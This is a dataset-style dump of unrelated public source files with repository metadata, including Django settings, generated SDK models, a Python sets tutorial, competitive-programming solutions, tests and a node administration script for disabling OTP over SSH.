# def __init__(self):
# pass
#
# def to_system_verilog(self):
# return "$"
|
[
"thor0505@comcast.net"
] |
thor0505@comcast.net
|
8e4ac45e01675c7b4f520a4a23d18060dc8c7369
|
cab678a44ecef2fcb9102588006e3080d4529481
|
/microsoft/store/partnercenterservices/models/microsoft_partner_sdk_contracts_v1_support_topic.py
|
df2acd2a2202668d37743f77e8790c7ac41b5299
|
[] |
no_license
|
eduardomourar/partner-center-python
|
410f61f1ff0dfa8fe34414b1012edba983c289dc
|
85e9617d58347fb6c3b8d50b728f9a10201e2f10
|
refs/heads/master
| 2020-04-19T19:21:16.543501
| 2020-01-28T12:10:33
| 2020-01-28T12:10:33
| 168,386,194
| 2
| 0
| null | 2020-01-28T12:10:35
| 2019-01-30T17:38:16
|
Python
|
UTF-8
|
Python
| false
| false
| 1,722
|
py
|
# coding=utf-8
# --------------------------------------------------------------------------
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class MicrosoftPartnerSdkContractsV1SupportTopic(Model):
"""Describes a support topic. Service requests specify a support topic to
ensure that they are processed quickly and effectively.
Variables are only populated by the server, and will be ignored when
sending a request.
:param name: Gets or sets the name of the support topic.
:type name: str
:param description: Gets or sets the description of the support topic.
:type description: str
:param id: Gets or sets the unique identifier of the support topic.
:type id: int
:ivar attributes: Gets the attributes.
:vartype attributes:
~microsoft.store.partnercenterservices.models.MicrosoftPartnerSdkContractsV1CommonResourceAttributes
"""
_validation = {
'attributes': {'readonly': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'description': {'key': 'description', 'type': 'str'},
'id': {'key': 'id', 'type': 'int'},
'attributes': {'key': 'attributes', 'type': 'MicrosoftPartnerSdkContractsV1CommonResourceAttributes'},
}
def __init__(self, name=None, description=None, id=None):
super(MicrosoftPartnerSdkContractsV1SupportTopic, self).__init__()
self.name = name
self.description = description
self.id = id
self.attributes = None
|
[
"eduardo.rodrigues@sentia.com"
] |
eduardo.rodrigues@sentia.com
|
8ac2409f5cb6f10f638f4a529a2f5abd608a6613
|
aacec9c81c1f015ac3f76d6e37d798e08b59d150
|
/sample/sample/settings.py
|
00ed6e4b6be213ff1107b7f54da769cb0c0096b0
|
[] |
no_license
|
meghalrag/djangoprgm
|
25ae32b04789dc9cdeda5ac64833e6e138234349
|
6a802a6b7a0c2044af24f4e0e90e034c0ba0d9ec
|
refs/heads/master
| 2020-05-19T22:20:51.979077
| 2019-05-06T18:05:42
| 2019-05-06T18:05:42
| 185,244,469
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,230
|
py
|
"""
Django settings for sample project.
Generated by 'django-admin startproject' using Django 1.11.6.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '+qn4gbqf!s-1qc_)bvtccf3n5x8*atnhkghn#99#-6yo*6b)(_'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'myapp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'sample.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'sample.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
|
[
"noreply@github.com"
] |
meghalrag.noreply@github.com
|
3a0f2b78a917ebbb93b31b448eff17706496fcb4
|
55d6de252e61c4b60688ebd8b1f637807acc1e7c
|
/custom_customer_payment_approval/models/models.py
|
83b0d97f1108f7bbd53d5c29fe68c31b90a5209d
|
[] |
no_license
|
mosadiqit/eerna_erp_uslbd
|
b707a1d49a4fce7c1543b63e0120e8f9b77b26ce
|
73e3994a9e32df7809d244eb6592513162ab7853
|
refs/heads/main
| 2023-06-30T14:53:04.837197
| 2021-08-04T11:30:46
| 2021-08-04T11:30:46
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 590
|
py
|
# -*- coding: utf-8 -*-
# from odoo import models, fields, api
# class custom_customer_payment_approval(models.Model):
# _name = 'custom_customer_payment_approval.custom_customer_payment_approval'
# _description = 'custom_customer_payment_approval.custom_customer_payment_approval'
# name = fields.Char()
# value = fields.Integer()
# value2 = fields.Float(compute="_value_pc", store=True)
# description = fields.Text()
#
# @api.depends('value')
# def _value_pc(self):
# for record in self:
# record.value2 = float(record.value) / 100
|
[
"ibrahimalazhar264@gmail.com"
] |
ibrahimalazhar264@gmail.com
|
3eea2bcd2377a53c6ec3a0fac375d30816303266
|
ede10f744f89dcc7c81a73e922cfd41c8c415b3f
|
/setoperation.py
|
2dc31b509a25cf4a50900a49bc5f21b382e8ff7e
|
[] |
no_license
|
Techsrijan/Python11
|
6d76ac9aaa1fe30a1a31f7dbe898927b439ac64b
|
c1080fcc027044137859e4e55ef6a8d3cb740c2a
|
refs/heads/master
| 2020-06-16T07:02:38.150544
| 2019-08-04T03:29:15
| 2019-08-04T03:29:15
| 195,508,033
| 0
| 35
| null | 2019-07-28T07:48:25
| 2019-07-06T06:52:21
|
Python
|
UTF-8
|
Python
| false
| false
| 618
|
py
|
marks={11,12,15,66,12}
print(marks)
marks.add(555)
print(marks)
marks.remove(12)
print(marks)
fruit=frozenset(['apple','mango'])
print(fruit)
#fruit.add('ss')
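# frozensets are immutable, so the add() call above would raise AttributeError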
# this will create a dictionary, not a set
a={}
print(a)
print(type(a))
# set function creates an empty set
b=set()
print(b)
print(type(b))
b= set(marks) #copy
print(b)
p={1,2,3,4}
q={4,5,61,1}
#union
print(p|q)
#intersection
print(p&q)
#difference
print(p-q) # elements which are in p but not in q
#symmetric difference
print(p^q)
print(p)
print(p.clear())
print(p)
# membership operator
print(15 in marks)
print(15 not in marks)
x= q.copy()
print(x)
|
[
"aswanibtech@gmail.com"
] |
aswanibtech@gmail.com
|
137ba7136d89e5ece45a8d4271fd13561c4b608f
|
13f25be5c1f9d4023fdc188af20699370bbc896d
|
/billy/commands/update_external_ids.py
|
3e37a7f86791dc9da57d8eb46cbb0c11f1901cb7
|
[] |
no_license
|
JT5D/billy
|
d303ca408527e122faebdd1c1047233cf0231d8c
|
de1586fddd30d354d80d6b6b2c7932e16bc02991
|
refs/heads/master
| 2020-12-25T15:51:22.750561
| 2012-09-14T16:23:18
| 2012-09-14T16:23:18
| 5,826,718
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,540
|
py
|
import json
import urllib
import urllib2
import time
import sys
from billy import db
from billy.conf import settings
from billy.commands import BaseCommand
class UpdateMissingIds(BaseCommand):
name = 'update-ext-ids'
help = 'update TransparencyData ids'
def add_args(self):
self.add_argument('abbrs', metavar='ABBR', type=str, nargs='+',
help='abbreviations for data to update')
self.add_argument('--apikey', help='the API key to use',
dest='API_KEY')
def handle(self, args):
for abbr in args.abbrs:
meta = db.metadata.find_one({'_id': abbr.lower()})
if not meta:
print "'{0}' does not exist in the database.".format(abbr)
sys.exit(1)
else:
print "Updating ids for {0}".format(abbr)
print "Updating TransparencyData ids..."
current_term = meta['terms'][-1]['name']
query = {'roles': {'$elemMatch':
{'type': 'member',
settings.LEVEL_FIELD: meta['abbreviation'],
'term': current_term},
},
'transparencydata_id': None,
'active': True,
}
updated = 0
initial_count = db.legislators.find(query).count()
abbrev = meta['_id'].upper()
for leg in db.legislators.find(query):
query = urllib.urlencode({'apikey': settings.API_KEY,
'search': leg['full_name'].encode('utf8')})
url = ('http://transparencydata.com/api/1.0/entities.json?' +
query)
data = urllib2.urlopen(url).read()
results = json.loads(data)
matches = []
for result in results:
if (result['state'] == abbrev and
result['seat'][6:] == leg['chamber'] and
result['type'] == 'politician'):
matches.append(result)
if len(matches) == 1:
leg['transparencydata_id'] = matches[0]['id']
db.legislators.save(leg, safe=True)
updated += 1
print 'Updated %s of %s missing transparencydata ids' % (updated,
initial_count)
time.sleep(30)
|
[
"james.p.turk@gmail.com"
] |
james.p.turk@gmail.com
|
e20d78120e7e8e868e2796fbd0ad91445e24f16a
|
eea1c66c80784d4aefeb0d5fd2e186f9a3b1ac6e
|
/atcoder/abc/abc101-200/abc170/d.py
|
6f7baffcc4792acd400908f7b89a52f59bfb752e
|
[] |
no_license
|
reo11/AtCoder
|
4e99d6f40d8befe264761e3b8c33d3a6b7ba0fe9
|
69c6d67f05cb9190d8fb07204488cd7ce4d0bed2
|
refs/heads/master
| 2023-08-28T10:54:50.859288
| 2023-08-22T18:52:47
| 2023-08-22T18:52:47
| 162,085,118
| 4
| 0
| null | 2023-07-01T14:17:28
| 2018-12-17T06:31:10
|
Python
|
UTF-8
|
Python
| false
| false
| 357
|
py
|
import sys
from collections import Counter
input = sys.stdin.readline
MAX = 1000001
dp = [True for _ in range(MAX)]
n = int(input())
a = list(map(int, input().split()))
cnt = Counter(a)
a = sorted(list(set(a)))
ans = 0
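# ABC170 D: count values that occur exactly once and are not divisible by any
# other element. Scanning distinct values in ascending order, dp[v] stays True
# only if no smaller element divides v; multiples of v are then sieved out.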
for v in a:
if cnt[v] <= 1 and dp[v]:
ans += 1
m = v
while m < MAX:
dp[m] = False
m += v
print(ans)
|
[
"reohirao116@gmail.com"
] |
reohirao116@gmail.com
|
da1424b954c6ea7946bf5c4b741adee5647928ce
|
2e69d2f140bb653938dc1b7238b85a4af4754123
|
/metanic/settings/development.py
|
24903ea9e622fd8f43c25fe974be2913277bb0c6
|
[
"BSD-3-Clause"
] |
permissive
|
metanic/services
|
f866d78e7207624cf4b420929d987b6005394d1d
|
a00b99f9b697864a078e2cb886be4d75c10458a9
|
refs/heads/master
| 2021-06-06T22:33:56.823827
| 2018-08-14T08:05:00
| 2018-08-14T08:05:00
| 115,375,318
| 0
| 0
|
NOASSERTION
| 2020-02-11T21:34:25
| 2017-12-26T01:57:09
|
Python
|
UTF-8
|
Python
| false
| false
| 2,287
|
py
|
from metanic.settings.defaults import INSTALLED_APPS
from metanic.settings.defaults import MIDDLEWARE
from metanic.settings.defaults import REST_FRAMEWORK
from metanic.settings.defaults import cache_url
from metanic.settings.defaults import env_value
from metanic.settings.defaults import project_path
# We specifically allow `import *` in this case to pull in expected settings
from metanic.settings.defaults import * # noqa
DEBUG = True
DEFAULT_FROM_EMAIL = 'services@metanic.local'
FRONTEND_URL = env_value('frontend_url', 'http://localhost:3030/')
MEDIA_ROOT = project_path('media')
MEDIA_URL = '/media/'
METANIC_REDIRECT_URL = 'http://localhost:3030/'
ROOT_URLCONF = 'metanic.core.urls.development'
STATIC_ROOT = project_path('static')
STATIC_URL = '/static/'
MAILGUN_API_KEY = env_value('mailgun_api_key', default='TEST')
ANYMAIL['MAILGUN_API_KEY'] = MAILGUN_API_KEY
SECRET_KEY = env_value(
'secret_key',
'diagonal stunning powder ledge employ dealer',
)
ACCESS_CONTROL_ALLOW_ORIGINS = [
'localhost:3030',
]
REST_FRAMEWORK['DEFAULT_THROTTLE_CLASSES'] = []
REST_FRAMEWORK['DEFAULT_AUTHENTICATION_CLASSES'] += (
    'rest_framework.authentication.SessionAuthentication',
)
REST_FRAMEWORK['DEFAULT_THROTTLE_RATES'] = {
'anon': env_value('anon_throttle_rate', default='100/second'),
'sensitive': env_value('sensitive_throttle_rate', default='100/second'),
'user': env_value('user_throttle_rate', default='100/second'),
}
INSTALLED_APPS += [
'debug_toolbar',
'django_extensions',
]
STATICFILES_FINDERS = [
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
MIDDLEWARE += [
'debug_toolbar.middleware.DebugToolbarMiddleware',
]
CACHES = {
'default': cache_url('redis://localhost:6379/0'),
}
DATABASES = {
'default':
{
'ENGINE':
'django.db.backends.sqlite3',
'NAME':
project_path(
env_value('DATABASE_FILENAME', 'metanic.sqlite3')
),
},
}
ALLOWED_HOSTS = [
'localhost',
'metanic.local',
]
ACCESS_CONTROL_ALLOW_ORIGINS = [
    '::1',
'127.0.0.1',
'127.0.0.1:*',
'localhost',
'localhost:*',
'metanic.local',
'metanic.local:*',
]
INTERNAL_IPS = [
'127.0.0.1',
]
|
[
"monokrome@monokro.me"
] |
monokrome@monokro.me
|
b8b6b730b3d1e9345cd8228e34aab0f42a31aa8c
|
f305f84ea6f721c2391300f0a60e21d2ce14f2a5
|
/19_数学/数论/BSGS/G - 222.py
|
6cdc9f5606b73ac8778ecd183c8606680b877f35
|
[] |
no_license
|
981377660LMT/algorithm-study
|
f2ada3e6959338ae1bc21934a84f7314a8ecff82
|
7e79e26bb8f641868561b186e34c1127ed63c9e0
|
refs/heads/master
| 2023-09-01T18:26:16.525579
| 2023-09-01T12:21:58
| 2023-09-01T12:21:58
| 385,861,235
| 225
| 24
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 630
|
py
|
# The sequence 2, 22, 222, ...
# !Does this sequence contain a term that is a multiple of k? If so, which term is the first?
# k <= 1e8
# !Equivalent to 2*(10^x - 1)/9 ≡ 0 (mod k)
# !i.e. 10^x ≡ 1 (mod k*9/gcd(k,2))
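# Worked example: for k = 3 the modulus is 3*9/gcd(3,2) = 27, and the smallest
# x with 10^x ≡ 1 (mod 27) is x = 3 (10^3 - 1 = 999 = 37*27); indeed 222 is
# the first term divisible by 3.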
from math import gcd
from bsgs import exbsgs
# i.e. the extended BSGS (exbsgs)
# TODO: this still has issues
import sys
sys.setrecursionlimit(int(1e9))
input = lambda: sys.stdin.readline().rstrip("\r\n")
MOD = 998244353
INF = int(4e18)
def find(k: int) -> int:
return exbsgs(10, 1, k * 9 // gcd(k, 2))
if __name__ == "__main__":
T = int(input())
for _ in range(T):
k = int(input())
print(find(k))
|
[
"lmt2818088@gmail.com"
] |
lmt2818088@gmail.com
|
94f9719ea3bafb52fb5ea71541380aa245912c33
|
afdeedfb743fbb149d36c14cfad65feaf03acd21
|
/code/1253-reconstruct-a-2-row-binary-matrix.py
|
bd9cbd79b960e9959b96f36d73f49227eb0ec9fe
|
[] |
no_license
|
linhx13/leetcode-code
|
f16cd4a0d35be34c41b86715fc9f3e8ec4b0a577
|
c71574acfc68174a091c1751f10985b8f5737a1f
|
refs/heads/master
| 2021-07-04T03:45:20.030275
| 2021-06-09T13:55:18
| 2021-06-09T13:55:18
| 70,423,464
| 0
| 1
| null | 2019-08-01T09:37:49
| 2016-10-09T18:48:33
| null |
UTF-8
|
Python
| false
| false
| 870
|
py
|
from typing import List
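# LeetCode 1253 (reconstruct a 2-row binary matrix): a column with colsum 2
# gets a 1 in both rows; a column with colsum 1 goes to whichever row still
# needs more ones; the reconstruction succeeds iff both row budgets reach
# exactly zero.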
class Solution:
def reconstructMatrix(
self, upper: int, lower: int, colsum: List[int]
) -> List[List[int]]:
n = len(colsum)
res = [[0] * n for _ in range(2)]
for i, s in enumerate(colsum):
if s == 2 or (s == 1 and lower < upper):
res[0][i] = 1
if s == 2 or (s == 1 and not res[0][i]):
res[1][i] = 1
upper -= res[0][i]
lower -= res[1][i]
if lower == 0 and upper == 0:
return res
else:
return []
if __name__ == "__main__":
# upper = 2
# lower = 3
# colsum = [2, 2, 1, 1]
upper = 5
lower = 5
colsum = [2, 1, 2, 0, 1, 0, 1, 2, 0, 1]
# upper = 1
# lower = 4
# colsum = [2, 1, 2, 0, 0, 2]
print(Solution().reconstructMatrix(upper, lower, colsum))
|
[
"mylhx288@gmail.com"
] |
mylhx288@gmail.com
|
3ee47a3f3fcc17860c659aea5450baf56dda10e5
|
312ab41033c2cb043d617d3e633c166503fd280c
|
/Informatikk/Bachelor/H2017/ITGK/Eksamner/2012/Oppgave_4f.py
|
aa7ca178ffff91e045fd53d574fa57141adaeafe
|
[] |
no_license
|
skanin/NTNU
|
cb9b833d9de0d504965979584370b8f353435cd1
|
e4023856f69060f8d3d09ff4990e29f7a75d98b1
|
refs/heads/master
| 2022-01-30T14:31:22.947512
| 2022-01-20T14:11:14
| 2022-01-20T14:11:14
| 113,476,017
| 4
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 506
|
py
|
def strange_weather(temp, rain):
x = None
y = None
for i in range(len(temp)-1):
if temp[i] < 0:
if temp[i] < temp[i+1] and rain[i] < rain[i+1]:
x = i
if temp[i] > temp[i+1] and rain[i] > rain[i+1]:
y = i
return x, y
return 0, 0
temp=[1,3, 4,-5,-6,-7,-8,-9,3,0]
rain=[0,20,30,0,10,30,50,0,5,2]
(start, stop) = strange_weather(temp, rain)
print("Start: " + str(start))
print("Stop: ", str(stop))
|
[
"sander.b.lindberg@gmail.com"
] |
sander.b.lindberg@gmail.com
|
ed6ba51a1f51da4a70789894dbbc3c28652b12bf
|
a08225934c425be313a12975c9563a72ded58be6
|
/round669/q1.py
|
851433744811d0efac4f1b094d4089b7adb1d6ae
|
[] |
no_license
|
marcus-aurelianus/codeforce
|
27c966554dee9986f23fb2925bd53e6cceb8b9e9
|
4764df151ade7806e32b6c88283a2de946f99e16
|
refs/heads/master
| 2023-03-18T09:30:55.042594
| 2021-03-12T18:14:08
| 2021-03-12T18:14:08
| 231,387,022
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 932
|
py
|
import sys
reader = (s.rstrip() for s in sys.stdin)
input = reader.__next__
def gift():
for _ in range(t):
n = int(input())
arry = list(map(int,input().split()))
count0 = 0
count1 = 0
for i in range(n):
if arry[i] == 1:
count1 += 1
else:
count0 += 1
if count0>count1:
if count0%2:
count0-=1
yield count0
yield " ".join(str(x) for x in count0*[0])
elif count0<count1:
if count1%2:
count1-=1
yield count1
yield " ".join(str(x) for x in count1*[1])
else:
yield count0
yield " ".join(str(x) for x in count0*[0])
if __name__ == '__main__':
t= int(input())
ans = gift()
print(*ans,sep='\n')
#"{} {} {}".format(maxele,minele,minele)
#1 0 1 0 1 0
|
[
"37787424+marcus-aurelianus@users.noreply.github.com"
] |
37787424+marcus-aurelianus@users.noreply.github.com
|
eff344fe4db23e7846abced170514cefc8dc4524
|
2031771d8c226806a0b35c3579af990dd0747e64
|
/pyobjc-framework-GameKit/PyObjCTest/test_gkleaderboardset.py
|
07d32c0476b2648b0ec250082721e960bbc9e8b1
|
[
"MIT"
] |
permissive
|
GreatFruitOmsk/pyobjc-mirror
|
a146b5363a5e39181f09761087fd854127c07c86
|
4f4cf0e4416ea67240633077e5665f5ed9724140
|
refs/heads/master
| 2018-12-22T12:38:52.382389
| 2018-11-12T09:54:18
| 2018-11-12T09:54:18
| 109,211,701
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 638
|
py
|
from PyObjCTools.TestSupport import *
import GameKit
class TestGKLeaderboardSet (TestCase):
@min_os_level('10.10')
def testMethods(self):
class TestGKLeaderboardSetHelper (GameKit.GKLeaderboardSet):
def loadImageWithCompletionHandler_(self, h): pass
self.assertArgIsBlock(GameKit.GKLeaderboardSet.loadLeaderboardSetsWithCompletionHandler_, 0, b'v@@')
self.assertArgIsBlock(GameKit.GKLeaderboardSet.loadLeaderboardsWithCompletionHandler_, 0, b'v@@')
self.assertArgIsBlock(TestGKLeaderboardSetHelper.loadImageWithCompletionHandler_, 0, b'v@@')
if __name__ == "__main__":
main()
|
[
"ronaldoussoren@mac.com"
] |
ronaldoussoren@mac.com
|
cc5944b4c83a4775a2bb0eb3623f8812a6f2e3ac
|
c4a2c5d2ee3bb946333bec267c337858c2eaa87c
|
/tests/bhive/test_asciichart.py
|
33f157a84494dea26f1582b0203b3aa21810eb53
|
[
"MIT"
] |
permissive
|
TheCrazyGM/bhive
|
93b237140def25a8cb4de0160678db116b45d4e0
|
1494e90a99123ecfc5efbd927258f9ba59443e2e
|
refs/heads/master
| 2021-04-10T20:15:59.966431
| 2020-03-22T23:50:52
| 2020-03-22T23:50:52
| 248,962,200
| 3
| 1
|
NOASSERTION
| 2020-10-27T22:24:53
| 2020-03-21T11:29:02
|
Python
|
UTF-8
|
Python
| false
| false
| 1,211
|
py
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from builtins import bytes
from builtins import range
from builtins import super
import string
import random
import unittest
import base64
from pprint import pprint
from bhive.asciichart import AsciiChart
class Testcases(unittest.TestCase):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
self.curve = [1.2, 4.3, 2.0, -1.3, 6.4, 0.]
def test_plot(self):
ac = AsciiChart(height=3, width=3)
self.assertEqual(len(ac.canvas), 0)
ret = ac.plot(self.curve, return_str=True)
ac.plot(self.curve, return_str=False)
self.assertTrue(len(ret) > 0)
ac.clear_data()
self.assertEqual(len(ac.canvas), 0)
def test_plot2(self):
ac = AsciiChart(height=3, width=3)
ac.clear_data()
ac.adapt_on_series(self.curve)
self.assertEqual(ac.maximum, max(self.curve))
self.assertEqual(ac.minimum, min(self.curve))
self.assertEqual(ac.n, len(self.curve))
ac.new_chart()
ac.add_axis()
ac.add_curve(self.curve)
|
[
"thecrazygm@gmail.com"
] |
thecrazygm@gmail.com
|
71f6ad5a698c326f96d84161d38f7a08056340a5
|
75e03232591b263a50523d7cfef4041db36caf01
|
/VMWsolutions/at2-vclient-032/cft/disable_node_otp.py
|
e3092e047d6ae3d778a3ded3eac14088fc42a51c
|
[] |
no_license
|
adamkittel/src
|
aaf157062d069998a8d18841895e7362cf868ff9
|
11e3927bd990b885eba595346694de2d2601d5c9
|
refs/heads/master
| 2021-01-11T16:13:14.592894
| 2017-01-25T18:29:09
| 2017-01-25T18:29:09
| 80,040,934
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,634
|
py
|
#!/usr/bin/python
"""
This action will disable OTP on a set of nodes
When run as a script, the following options/env variables apply:
--node_ips The list of node management IP addresses
SFNODE_IPS
--ssh_user The nodes SSH username
SFSSH_USER env var
--ssh_pass The nodes SSH password
SFSSH_PASS
"""
import sys
from optparse import OptionParser
import lib.libsf as libsf
from lib.libsf import mylog
import otp.libotp as libotp
import logging
import lib.sfdefaults as sfdefaults
from lib.action_base import ActionBase
from lib.datastore import SharedValues
class DisableNodeOtpAction(ActionBase):
class Events:
"""
Events that this action defines
"""
FAILURE = "FAILURE"
def __init__(self):
super(self.__class__, self).__init__(self.__class__.Events)
def ValidateArgs(self, args):
libsf.ValidateArgs({"node_ips" : libsf.IsValidIpv4AddressList},
args)
def Execute(self, node_ips=None, ssh_user=sfdefaults.ssh_user, ssh_pass=sfdefaults.ssh_pass, debug=False):
"""
Disable OTP on a list of nodes
"""
if not node_ips:
node_ips = sfdefaults.node_ips
self.ValidateArgs(locals())
if debug:
mylog.console.setLevel(logging.DEBUG)
allgood = True
for node_ip in node_ips:
try:
mylog.info(node_ip + ": Removing OTP config")
libotp.ExecSshCommand(node_ip, ssh_user, ssh_pass, "cp /sf/backup/sshd_config /etc/sshd; cp /sf/backup/sshd /etc/pam.d; rm -f /root/.otpw")
libotp.ExecSshCommand(node_ip, ssh_user, ssh_pass, "service ssh restart")
except libsf.SfError as e:
mylog.error(node_ip + ": " + str(e))
self.RaiseFailureEvent(message=str(e), nodeIP=node_ip, exception=e)
allgood = False
if allgood:
mylog.passed("Successfully disabled OTP on all nodes")
return True
else:
mylog.error("Failed to disable OTP on all nodes")
return False
# Instantiate the class and add its attributes to the module
# This allows it to be executed simply as module_name.Execute
libsf.PopulateActionModule(sys.modules[__name__])
if __name__ == '__main__':
mylog.debug("Starting " + str(sys.argv))
# Parse command line arguments
parser = OptionParser(option_class=libsf.ListOption, description=libsf.GetFirstLine(sys.modules[__name__].__doc__))
parser.add_option("-n", "--node_ips", action="list", dest="node_ips", default=None, help="the IP addresses of the nodes")
parser.add_option("--ssh_user", type="string", dest="ssh_user", default=sfdefaults.ssh_user, help="the SSH username for the nodes")
parser.add_option("--ssh_pass", type="string", dest="ssh_pass", default=sfdefaults.ssh_pass, help="the SSH password for the nodes")
parser.add_option("--debug", action="store_true", dest="debug", default=False, help="display more verbose messages")
(options, extra_args) = parser.parse_args()
try:
timer = libsf.ScriptTimer()
if Execute(options.node_ips, options.ssh_user, options.ssh_pass, options.debug):
sys.exit(0)
else:
sys.exit(1)
except libsf.SfArgumentError as e:
mylog.error("Invalid arguments - \n" + str(e))
sys.exit(1)
except SystemExit:
raise
except KeyboardInterrupt:
mylog.warning("Aborted by user")
Abort()
sys.exit(1)
except:
mylog.exception("Unhandled exception")
sys.exit(1)
|
[
"adam.kittel@solidfire.com"
] |
adam.kittel@solidfire.com
|
366fff143610fe845b7b6e6395ef18c03343fd2a
|
a468016412cc2b435501de4d3ee5c4d2be5fa19f
|
/coupons/models.py
|
305be09c0686ea6f5f965be1fc9468e3968e0bac
|
[] |
no_license
|
sadakchap/first-full-ecom
|
ef022596c05c29cae0842bae34d201cd4af08b93
|
881b39ec60dff3aef04105e3d08e3be3e16f6420
|
refs/heads/master
| 2020-08-07T05:02:48.165873
| 2019-10-07T06:16:16
| 2019-10-07T06:16:16
| 213,308,847
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 485
|
py
|
from django.db import models
from django.core.validators import MinValueValidator,MaxValueValidator
# Create your models here.
class Coupon(models.Model):
code = models.CharField(max_length=255,unique=True)
valid_from = models.DateTimeField()
valid_to = models.DateTimeField()
discount = models.IntegerField(validators=[MinValueValidator(0),MaxValueValidator(100)])
active = models.BooleanField()
def __str__(self):
return self.code
|
[
"aliceprerna@gmail.com"
] |
aliceprerna@gmail.com
|
5f4574f19704732b35e9a1608f3760eaacfdcd64
|
bd93fa910151c278be8249055bc084e5a5c35a6a
|
/Python/itcast/01-Python进阶1/3面向对象/02魔法方法str.py
|
87b7cb966fb02fd2b8c31c726aea63b56963dabb
|
[] |
no_license
|
ahojcn/practice-code
|
bd81595b80239cd2550183093566bd536a83ed3f
|
b65f4e76271479269463e92fd3fd41585c2ac792
|
refs/heads/master
| 2021-07-10T14:15:08.036592
| 2020-07-09T11:32:16
| 2020-07-09T11:32:16
| 153,059,349
| 2
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 717
|
py
|
"""
__str__ is the equivalent of Java's toString()
"""
class Cat:
def __init__(self, name, age, sex):
self._name = name
self._age = age
self._sex = sex
def __str__(self):
return "姓名:" + self._name \
+ "年龄:" + str(self._age) \
+ "性别:" + self._sex
def eat(self):
print(self._name + "吃鱼...")
def drink(self):
print(self._name + "喝可乐...")
def info(self):
print("name:" + self._name + \
", age:" + str(self._age) + \
", sex:" + self._sex)
tom = Cat("汤姆", 20, "男")
print(tom)
print(" 分界线 ".center(50, "*"))
lanmao = Cat("蓝猫", 10, "女")
print(lanmao)
|
[
"hanoi_ahoj@icloud.com"
] |
hanoi_ahoj@icloud.com
|
e81a46145ac0da82da2536133a7c0a69c8ffc392
|
7c82896f5322ffd5d61697ed597f4d2c53e4e744
|
/backend/ecommernce_25667/wsgi.py
|
16d515f35532223e7e77c29bf39f2a5ff06566df
|
[] |
no_license
|
crowdbotics-apps/ecommernce-25667
|
c4487f6c19a3d4dc608fd2a13291f74c84b53dc7
|
55dd1c6293fcfbec01aec7e8e0118ed8b1c48130
|
refs/heads/master
| 2023-04-02T00:48:51.026549
| 2021-04-13T19:40:25
| 2021-04-13T19:40:25
| 357,668,171
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 409
|
py
|
"""
WSGI config for ecommernce_25667 project.
It exposes the WSGI callable as a module-level variable named ``application``.
For more information on this file, see
https://docs.djangoproject.com/en/2.2/howto/deployment/wsgi/
"""
import os
from django.core.wsgi import get_wsgi_application
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "ecommernce_25667.settings")
application = get_wsgi_application()
|
[
"team@crowdbotics.com"
] |
team@crowdbotics.com
|
539f8f2da156d8b3ce8a755659f688fe6ee1d71e
|
a1119965e2e3bdc40126fd92f4b4b8ee7016dfca
|
/branches/nacl_repy/seattlelib/serialize.repy
|
29a142d7996092ac9787ccb13497c54fdc3571d5
|
[
"MIT"
] |
permissive
|
